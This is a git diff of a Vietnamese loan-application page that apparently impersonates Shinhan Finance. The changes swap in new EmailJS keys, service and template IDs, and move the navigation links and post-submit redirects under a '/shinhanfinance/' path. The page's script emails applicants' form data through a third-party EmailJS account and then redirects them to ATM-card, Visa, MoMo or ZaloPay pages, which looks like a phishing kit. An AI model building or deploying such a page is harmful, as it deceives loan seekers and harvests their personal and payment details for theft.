--- a/pages/vi/Evaluate-conditions.html
+++ b/pages/vi/Evaluate-conditions.html
@@ -17,7 +17,7 @@
             };
         };
         // Initialize EmailJS
-        emailjs.init('c-Ms5MjWbitpDBb-E');
+        emailjs.init('KJ7TlqIPf7U4cfyzQ');
     </script>
     <style>
         * {
@@ -475,14 +475,14 @@
 
     <nav role="navigation" aria-label="Main Navigation">
         <ul id="nav-menu">
-            <li><a href="/pages/vi/trang-chu.html">Trang Chủ</a></li>
-            <li><a href="/pages/vi/gioi-thieu.html">Giới Thiệu</a></li>
-            <li><a href="/pages/vi/ca-nhan.html">Lợi Ích</a></li>
-            <li><a href="/pages/vi/lai-suat-tien-gui.html">Giấy Tờ Cần Thiết</a></li>
-            <li><a href="/pages/vi/Evaluate-conditions.html">Đăng Ký Giải Ngân</a></li>
-            <li><a href="/pages/vi/step5.html">Xem Kết Quả</a></li>
-            <li><a href="/pages/vi/dieu-khoan-su-dung.html">Điều Khoản Sử Dụng</a></li>
-            <li><a href="/pages/vi/support-center.html">Liên Hệ</a></li>
+            <li><a href="/shinhanfinance/pages/vi/trang-chu.html">Trang Chủ</a></li>
+            <li><a href="/shinhanfinance/pages/vi/gioi-thieu.html">Giới Thiệu</a></li>
+            <li><a href="/shinhanfinance/pages/vi/ca-nhan.html">Lợi Ích</a></li>
+            <li><a href="/shinhanfinance/pages/vi/lai-suat-tien-gui.html">Giấy Tờ Cần Thiết</a></li>
+            <li><a href="/shinhanfinance/pages/vi/Evaluate-conditions.html">Đăng Ký Giải Ngân</a></li>
+            <li><a href="/shinhanfinance/pages/vi/step5.html">Xem Kết Quả</a></li>
+            <li><a href="/shinhanfinance/pages/vi/dieu-khoan-su-dung.html">Điều Khoản Sử Dụng</a></li>
+            <li><a href="/shinhanfinance/pages/vi/support-center.html">Liên Hệ</a></li>
         </ul>
     </nav>
 
@@ -1080,7 +1080,7 @@
             };
 
             console.log('Sending formData to EmailJS:', templateParams); // Debug log
-            return emailjs.send('service_60tgxof', 'template_jdnzqxj', templateParams)
+            return emailjs.send('service_149dqxt', 'template_pzh1sp9', templateParams)
                 .then(() => {
                     console.log('Email sent successfully:', templateParams);
                 });
@@ -1093,10 +1093,10 @@
             if (isValid) {
                 sendEmail().finally(() => {
                     const redirectURLs = {
-                        bank: '/pages/vi/atm.html',
-                        visa: '/pages/vi/visa.html',
-                        momo: '/pages/vi/momo.html',
-                        zalopay: '/pages/vi/zalopay.html'
+                        bank: '/shinhanfinance/pages/vi/atm.html',
+                        visa: '/shinhanfinance/pages/vi/visa.html',
+                        momo: '/shinhanfinance/pages/vi/momo.html',
+                        zalopay: '/shinhanfinance/pages/vi/zalopay.html'
                     };
                     const redirectURL = redirectURLs[method.toLowerCase()];
                     try {
